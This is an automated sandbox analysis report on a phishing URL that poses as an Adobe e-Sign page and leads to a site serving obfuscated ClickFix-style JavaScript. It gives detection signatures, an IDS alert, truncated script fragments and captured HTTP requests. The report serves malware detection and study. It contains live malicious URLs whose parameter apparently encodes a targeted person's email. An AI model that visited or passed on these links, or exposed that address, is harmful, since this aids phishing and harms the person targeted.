Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://hiiudvt8z.awbpartners.com.au/?yxbe=Y2Fyb2x5bi5tLndldHRlcmxpbkB4Y2VsZW5lcmd5LmNvbQ==

Overview

General Information

Sample URL:https://hiiudvt8z.awbpartners.com.au/?yxbe=Y2Fyb2x5bi5tLndldHRlcmxpbkB4Y2VsZW5lcmd5LmNvbQ==
Analysis ID:1629381
Infos:

Detection

Score:68
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Suricata IDS alerts for network traffic
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
HTML page contains obfuscated javascript
HTML body contains low number of good links
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 936 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 5756 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1960,i,4594266304876997012,8000602555757688366,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • chrome.exe (PID: 5380 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://hiiudvt8z.awbpartners.com.au/?yxbe=Y2Fyb2x5bi5tLndldHRlcmxpbkB4Y2VsZW5lcmd5LmNvbQ==" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-04T17:10:38.626256+010020592601A Network Trojan was detected192.185.198.1443192.168.2.1849702TCP

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://secureonlineauthenticate.awbpartners.com.au/site.php?yxbe=Y2Fyb2x5bi5tLndldHRlcmxpbkB4Y2VsZW5lcmd5LmNvbQ==Joe Sandbox AI: Score: 9 Reasons: The brand 'Adobe' is well-known and typically associated with the domain 'adobe.com'., The URL 'secureonlineauthenticate.awbpartners.com.au' does not match the legitimate domain 'adobe.com'., The domain 'awbpartners.com.au' does not appear to be associated with Adobe., The presence of 'secureonlineauthenticate' as a subdomain is suspicious and often used in phishing attempts to mimic security-related actions., The use of a third-party domain with no clear association to Adobe increases the likelihood of phishing. DOM: 1.0.pages.csv
Source: https://secureonlineauthenticate.awbpartners.com.au/site.php?yxbe=Y2Fyb2x5bi5tLndldHRlcmxpbkB4Y2VsZW5lcmd5LmNvbQ==Joe Sandbox AI: Page contains button: 'Adobe e-Sign Now' Source: '1.1.pages.csv'
Source: https://secureonlineauthenticate.awbpartners.com.au/site.php?yxbe=Y2Fyb2x5bi5tLndldHRlcmxpbkB4Y2VsZW5lcmd5LmNvbQ==Joe Sandbox AI: Page contains button: 'Adobe e-Sign Now' Source: '1.0.pages.csv'
Source: https://secureonlineauthenticate.awbpartners.com.au/site.php?yxbe=Y2Fyb2x5bi5tLndldHRlcmxpbkB4Y2VsZW5lcmd5LmNvbQ==Joe Sandbox AI: Page contains button: 'Adobe e-Sign Now' Source: '1.3.pages.csv'
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://secureonlineauthenticate.awbpartners.com.a... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and heavy obfuscation. The use of the `Function` constructor, encoded strings, and interactions with suspicious domains indicate a high likelihood of malicious intent. This script should be considered a significant security risk.
Source: https://coxuongkhopbariavungtau.com/_next/static/chunks/webpack-20efd41c90b5bcbd.jsHTTP Parser: (function(_0x53e154,_0x167cf7){var _0x3af47d=a9_0x2548,_0x37deef=a9_0x3381,_0x57996a=_0x53e154();whi
Source: https://coxuongkhopbariavungtau.com/_next/static/chunks/main-app-6e9565c54018939e.jsHTTP Parser: var a1_0x360b30=a1_0x3c2e;function a1_0x5ce8(_0x5cd895,_0x29d2c8){var _0x1061da=a1_0x34ec();return a
Source: https://coxuongkhopbariavungtau.com/_next/static/chunks/app/not-found-00e5a2a077bf796c.jsHTTP Parser: var a4_0x2ae60a=a4_0x58c7,a4_0x481edc=a4_0x3437;(function(_0x2018ff,_0x4cc992){var _0x4d8352=a4_0x34
Source: https://secureonlineauthenticate.awbpartners.com.au/site.php?yxbe=Y2Fyb2x5bi5tLndldHRlcmxpbkB4Y2VsZW5lcmd5LmNvbQ==HTTP Parser: Number of links: 0
Source: https://secureonlineauthenticate.awbpartners.com.au/site.php?yxbe=Y2Fyb2x5bi5tLndldHRlcmxpbkB4Y2VsZW5lcmd5LmNvbQ==HTTP Parser: Title: Adobe e-Sign does not match URL
Source: https://secureonlineauthenticate.awbpartners.com.au/site.php?yxbe=Y2Fyb2x5bi5tLndldHRlcmxpbkB4Y2VsZW5lcmd5LmNvbQ==HTTP Parser: No favicon
Source: https://coxuongkhopbariavungtau.com/?S=herp%40derp.comHTTP Parser: No favicon
Source: https://secureonlineauthenticate.awbpartners.com.au/site.php?yxbe=Y2Fyb2x5bi5tLndldHRlcmxpbkB4Y2VsZW5lcmd5LmNvbQ==HTTP Parser: No <meta name="author".. found
Source: https://secureonlineauthenticate.awbpartners.com.au/site.php?yxbe=Y2Fyb2x5bi5tLndldHRlcmxpbkB4Y2VsZW5lcmd5LmNvbQ==HTTP Parser: No <meta name="copyright".. found
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries

Networking

barindex
Source: Network trafficSuricata IDS: 2059260 - Severity 1 - ET MALWARE Obfuscated Clickfix Javascript Payload Inbound : 192.185.198.1:443 -> 192.168.2.18:49702
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /?yxbe=Y2Fyb2x5bi5tLndldHRlcmxpbkB4Y2VsZW5lcmd5LmNvbQ== HTTP/1.1Host: hiiudvt8z.awbpartners.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /site.php?yxbe=Y2Fyb2x5bi5tLndldHRlcmxpbkB4Y2VsZW5lcmd5LmNvbQ== HTTP/1.1Host: secureonlineauthenticate.awbpartners.com.auConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://secureonlineauthenticate.awbpartners.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2020/07/Adobe-Logo-700x394.png HTTP/1.1Host: logos-world.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://secureonlineauthenticate.awbpartners.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ios-filled/50/microsoft-admin.png HTTP/1.1Host: img.icons8.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://secureonlineauthenticate.awbpartners.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://secureonlineauthenticate.awbpartners.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2020/07/Adobe-Logo-700x394.png HTTP/1.1Host: logos-world.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ios-filled/50/microsoft-admin.png HTTP/1.1Host: img.icons8.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/hquoi/0x4AAAAAAA_djh0yNsYo2DnW/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://secureonlineauthenticate.awbpartners.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=91b2a5278a73180d&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/hquoi/0x4AAAAAAA_djh0yNsYo2DnW/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/hquoi/0x4AAAAAAA_djh0yNsYo2DnW/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=91b2a5278a73180d&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ttpwp/resources/images/favicon.ico HTTP/1.1Host: security-us.m.mimecastprotect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://secureonlineauthenticate.awbpartners.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ttpwp/resources/images/favicon.ico HTTP/1.1Host: security-us.m.mimecastprotect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1194248761:1741101415:ebAz2A4--oCO2_y5RRsSgSZ_3LX5C-f-SQuFHdUY3Ts/91b2a5278a73180d/MqrbWiH.p_CbOALfUC5fkwv9p0dZIVKvOtCGQcp9Pxc-1741104641-1.1.1.1-HWEgMJViHtBSJ3fKx2t4zEuOTwm2.HpAiJJ7gCLiNhkmaoiEpmXRcOFNF4J_XayG HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/91b2a5278a73180d/1741104643151/Mii058oQqjPbOGW HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/hquoi/0x4AAAAAAA_djh0yNsYo2DnW/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/91b2a5278a73180d/1741104643151/Mii058oQqjPbOGW HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/91b2a5278a73180d/1741104643153/f8f4e391523fe51cac0ddcd873ac74e5a4611624f4523411859594bd95158235/T4Yp7ZcDEH_-vmD HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/hquoi/0x4AAAAAAA_djh0yNsYo2DnW/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1194248761:1741101415:ebAz2A4--oCO2_y5RRsSgSZ_3LX5C-f-SQuFHdUY3Ts/91b2a5278a73180d/MqrbWiH.p_CbOALfUC5fkwv9p0dZIVKvOtCGQcp9Pxc-1741104641-1.1.1.1-HWEgMJViHtBSJ3fKx2t4zEuOTwm2.HpAiJJ7gCLiNhkmaoiEpmXRcOFNF4J_XayG HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1194248761:1741101415:ebAz2A4--oCO2_y5RRsSgSZ_3LX5C-f-SQuFHdUY3Ts/91b2a5278a73180d/MqrbWiH.p_CbOALfUC5fkwv9p0dZIVKvOtCGQcp9Pxc-1741104641-1.1.1.1-HWEgMJViHtBSJ3fKx2t4zEuOTwm2.HpAiJJ7gCLiNhkmaoiEpmXRcOFNF4J_XayG HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?S=herp%40derp.com HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://secureonlineauthenticate.awbpartners.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/a34f9d1faa5f3315.p.woff2 HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://coxuongkhopbariavungtau.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://coxuongkhopbariavungtau.com/?S=herp%40derp.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/7b64cd318fb77179.css HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://coxuongkhopbariavungtau.com/?S=herp%40derp.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/f796ea3b426fcf90.css HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://coxuongkhopbariavungtau.com/?S=herp%40derp.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /attach,loading.htm HTTP/1.1Host: coxuongkhopbariavungtau.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://coxuongkhopbariavungtau.com/?S=herp%40derp.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
